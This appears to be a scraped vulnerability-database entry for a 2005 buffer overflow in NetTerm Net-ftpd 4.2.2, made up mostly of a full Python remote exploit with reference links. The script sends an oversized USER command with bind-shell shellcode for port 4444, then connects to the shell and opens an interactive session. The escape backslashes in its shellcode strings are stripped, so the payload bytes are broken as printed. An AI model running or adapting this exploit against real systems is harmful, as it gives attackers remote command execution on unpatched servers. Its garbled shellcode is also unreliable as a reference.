https://www.exploit-db.com/exploits/955
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-616

IntersoftNetTermNetftpd是一款小型FTP服务程序，可使用在MicrosoftWindows操作系统下。

#
# Net-ftpd 4.2.2 user autentication b0f exploit (0day)
# coded by Sergio 'shadown' Alvarez
#

import struct
import socket
import sys
import time

class warftpd:
	def __init__(self, host, port):
		self.host		= host
		self.port		= port
		self.bsize		= 512
		self.ebpaddr	= 0xcacacaca
		self.retaddr	= 0xdeadbeef
		self.sctype		= 'findskt'
		self.scport		= None

	def setebpaddr(self, addr):
		self.ebpaddr = addr

	def setretaddr(self, addr):
		self.retaddr = addr

	def setbsize(self, size):
		self.bsize = size

	def setsctype(self, type):
		self.sctype = type

	def setscport(self, port):
		self.scport = port

	def genbuffer(self):
		## 
		# Alpha port bind 4444, thanx metasploit
		## 
		sc = "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
		sc += "x49x49x49x49x49x49x49x49x49x49x37x49x51x5ax6ax46"
		sc += "x58x30x41x31x50x42x41x6bx42x41x56x42x32x42x41x32"
		sc += "x41x41x30x41x41x58x50x38x42x42x75x69x79x6bx4cx70"
		sc += "x6ax78x6bx70x4fx6dx38x59x69x49x6fx69x6fx6bx4fx61"
		sc += "x70x4cx4bx70x6cx35x74x66x44x6cx4bx73x75x45x6cx4c"
		sc += "x4bx31x6cx55x55x62x58x54x41x38x6fx6ex6bx50x4fx57"
		sc += "x68x4cx4bx33x6fx65x70x56x61x38x6bx69x73x50x30x37"
		sc += "x39x6cx4bx50x34x4ex6bx77x71x58x6ex34x71x4bx70x4a"
		sc += "x39x6ex4cx6bx34x4fx30x64x34x35x57x6bx71x6bx7ax56"
		sc += "x6dx53x31x78x42x7ax4bx69x64x35x6bx32x74x61x34x76"
		sc += "x48x44x35x4dx33x4cx4bx63x6fx56x44x37x71x5ax4bx50"
		sc += "x66x6ex6bx66x6cx32x6bx4cx4bx31x4fx45x4cx75x51x38"
		sc += "x6bx34x43x76x4cx4cx4bx6bx39x72x4cx45x74x47x6cx63"
		sc += "x51x7ax63x45x61x4fx30x53x54x4ex6bx67x30x30x30x4c"
		sc += "x4bx63x70x34x4cx4ex6bx34x30x37x6cx4ex4dx4ex6bx71"
		sc += "x50x55x58x61x4ex73x58x6ex6ex70x4ex64x4ex68x6cx70"
		sc += "x50x4bx4fx6bx66x30x31x49x4bx50x66x52x73x53x56x30"
		sc += "x68x74x73x57x42x43x58x61x67x61x63x75x62x63x6fx36"
		sc += "x34x49x6fx58x50x45x38x4ax6bx4ax4dx39x6cx57x4bx56"
		sc += "x30x69x6fx5ax76x43x6fx4dx59x78x65x35x36x4cx41x48"
		sc += "x6dx66x68x37x72x71x45x62x4ax64x42x6bx4fx38x50x35"
		sc += "x38x6ex39x64x49x7ax55x4cx6dx31x47x79x6fx6ex36x56"
		sc += "x33x62x73x72x73x30x53x71x43x77x33x30x53x67x33x36"
		sc += "x33x59x6fx7ax70x30x66x70x68x76x71x73x6cx41x76x72"
		sc += "x73x6fx79x7ax41x4cx55x32x48x4cx64x44x5ax74x30x4a"
		sc += "x67x56x37x49x6fx4ax76x51x7ax44x50x42x71x53x65x6b"
		sc += "x4fx38x50x30x68x6fx54x4ex4dx44x6ex79x79x30x57x79"
		sc += "x6fx68x56x41x43x30x55x4bx4fx4ax70x52x48x4dx35x67"
		sc += "x39x6fx76x30x49x33x67x6bx4fx4ax76x72x70x63x64x61"
		sc += "x44x30x55x49x6fx38x50x4cx53x65x38x4bx57x72x59x6a"
		sc += "x66x63x49x72x77x69x6fx78x56x41x45x4bx4fx6ax70x70"
		sc += "x66x70x6ax63x54x61x76x30x68x43x53x72x4dx6cx49x68"
		sc += "x65x53x5ax70x50x53x69x76x49x6ax6cx6fx79x4dx37x61"
		sc += "x7ax67x34x4ex69x59x72x37x41x6bx70x6ax53x4cx6ax59"
		sc += "x6ex53x72x56x4dx59x6ex33x72x64x6cx6cx53x4ex6dx42"
		sc += "x5ax35x68x4cx6bx6ex4bx4ex4bx72x48x44x32x6bx4ex4d"
		sc += "x63x54x56x79x6fx43x45x32x64x6bx4fx6bx66x33x6bx53"
		sc += "x67x30x52x63x61x66x31x52x71x53x5ax74x41x56x31x32"
		sc += "x71x73x65x50x51x4bx4fx5ax70x32x48x6cx6dx4ax79x47"
		sc += "x75x48x4ex62x73x6bx4fx7ax76x61x7ax6bx4fx6bx4fx35"
		sc += "x67x6bx4fx68x50x6ex6bx31x47x4bx4cx6dx53x68x44x41"
		sc += "x74x4bx4fx4ex36x36x32x49x6fx68x50x75x38x6cx30x4f"
		sc += "x7ax56x64x31x4fx43x63x59x6fx4ax76x4bx4fx38x50x46"
		
		# shellcode
		#sc		=	"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17xe0x66"
		#sc		+=	"x1cxc2x83xebxfcxe2xf4x1cx8ex4axc2xe0x66x4fx97xb6"
		#sc		+=	"x31x97xaexc4x7ex97x87xdcxedx48xc7x98x67xf6x49xaa"
		#sc		+=	"x7ex97x98xc0x67xf7x21xd2x2fx97xf6x6bx67xf2xf3x1f"
		#sc		+=	"x9ax2dx02x4cx5exfcxb6xe7xa7xd3xcfxe1xa1xf7x30xdb"
		#sc		+=	"x1ax38xd6x95x87x97x98xc4x67xf7xa4x6bx6ax57x49xba"
		#sc		+=	"x7ax1dx29x6bx62x97xc3x08x8dx1exf3x20x39x42x9fxbb"
		#sc		+=	"xa4x14xc2xbex0cx2cx9bx84xedx05x49xbbx6ax97x99xfc"
		#sc		+=	"xedx07x49xbbx6ex4fxaax6ex28x12x2ex1fxb0x95x05x61"
		#sc		+=	"x8ax1cxc3xe0x66x4bx94xb3xefxf9x2axc7x66x1cxc2x70"
		#sc		+=	"x67x1cxc2x56x7fx04x25x44x7fx6cx2bx05x2fx9ax8bx44"
		#sc		+=	"x7cx6cx05x44xcbx32x2bx39x6fxe9x6fx2bx8bxe0xf9xb7"
		#sc		+=	"x35x2ex9dxd3x54x1cx99x6dx2dx3cx93x1fxb1x95x1dx69"
		#sc		+=	"xa5x91xb7xf4x0cx1bx9bxb1x35xe3xf6x6fx99x49xc6xb9"
		#sc		+=	"xefx18x4cx02x94x37xe5xb4x99x2bx3dxb5x56x2dx02xb0"
		#sc		+=	"x36x4cx92xa0x36x5cx92x1fx33x30x4bx27x57xc7x91xb3"
		#sc		+=	"x0ex1exc2xf1x3ax95x22x8ax76x4cx95x1fx33x38x91xb7"
		#sc		+=	"x99x49xeaxb3x32x4bx3dxb5x46x95x05x88x25x51x86xe0"
		#sc		+=	"xefxffx45x1ax57xdcx4fx9cx42xb0xa8xf5x3fxefx69x67"
		#sc		+=	"x9cx9fx2exb4xa0x58xe6xf0x22x7ax05xa4x42x20xc3xe1"
		#sc		+=	"xefx60xe6xa8xefx60xe6xacxefx60xe6xb0xebx58xe6xf0"
		#sc		+=	"x32x4cx93xb1x37x5dx93xa9x37x4dx91xb1x99x69xc2x88"
		#sc		+=	"x14xe2x71xf6x99x49xc6x1fxb6x95x24x1fx13x1cxaax4d"
		#sc		+=	"xbfx19x0cx1fx33x18x4bx23x0cxe3x3dxd6x99xcfx3dx95"
		#sc		+=	"x66x74x32x6ax62x43x3dxb5x62x2dx19xb3x99xccxc2"
		# other stuff
		nops	=	"x41"*(self.bsize-len(sc)-50)
		ebp	=	struct.pack('<L', self.ebpaddr)
		# check if the value is an integer, otherwise it should be a string
		if self.retaddr.__class__.__name__ == 'int':
			ret	=	struct.pack('<L', self.retaddr)
		else:
			ret	=	self.retaddr
		# assemble buffer to send
		buffer	=	"USER "
		buffer	+=	nops
		buffer	+=	sc
		buffer	+=	'x42'*(50-4)
		buffer	+=	ebp
		buffer	+=	ret
		return buffer

	def exploit(self):
		# connect
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, self.port))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			return None
		print "[+] Connected to %s:%d" % (self.host, self.port)
		# recv banner
		print "[+] Receiving Banner"
		res = skt.recv(100)
		print res
		# send payload
		time.sleep(1)
		print "[+] Sending payload"
		skt.send(self.genbuffer())
		time.sleep(2) # test on mcafee anti-b0f
		skt.close()
		# if successfull connect to the shell
		time.sleep(2)
		skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		try:
			skt.connect((self.host, 4444))
		except socket.error, err:
			print "[-] Error: %s" % err[1]
			print "[-] Explotation failedn[-] Daemon should be dead..."
			return None
		print "[+] Connected to shell at %s on port %d" % (self.host, 4444)
		res = skt.recv(1024)
		if res:
			if res.count('Microsoft Windows'):
				print "[+] Welcome my lord, i'm here to serve you ;) ...n"
				from telnetlib import Telnet
				telnet = Telnet()
				telnet.sock = skt
				try:
					telnet.interact()
				except:
					pass
				skt.close()
				print "[-] Bye..bye I hope you've enjoyed your stay.. ;)"
				return None
		skt.close()
		print '[-] Explotation failednDaemon should be dead...'

if __name__ == '__main__':
	if len(sys.argv) != 3:
		print "*************************************"
		print "* Coded by Sergio 'shadown' Alvarez *"
		print "*          [email protected]        *"
		print "*************************************"
		print "Usage: %s host port" % sys.argv[0]
		sys.exit(1)

	exp = warftpd(sys.argv[1], int(sys.argv[2]))
	exp.setsctype('findskt')
	exp.setscport(1234)
	exp.setbsize(1014)
	exp.setebpaddr(0xdeadbeef) # sometimes needed, just in case
	exp.setretaddr('x4cxfax12x00') # Universal Win2k SP0/SP1/SP2/SP3/SP4 (jmp to our input buffer)
	exp.exploit()

# milw0rm.com [2005-04-26]

来源:XF
名称:netterm-netftpd-user-bo(20285)
链接:http://xforce.iss.net/xforce/xfdb/20285
来源:BID
名称:13396
链接:http://www.securityfocus.com/bid/13396
来源:BUGTRAQ
名称:20050426ADV:NetTerm’sNetFtpd4.2.2BufferOverflow+PoCExploit
链接:http://www.securityfocus.com/archive/1/396959
来源:www.securenetterm.com
链接:http://www.securenetterm.com/html/what_s_new.html
来源:OSVDB
名称:15865
链接:http://www.osvdb.org/15865
来源:VUPEN
名称:ADV-2005-0407
链接:http://www.frsirt.com/english/advisories/2005/0407
来源:SECUNIA
名称:15140
链接:http://secunia.com/advisories/15140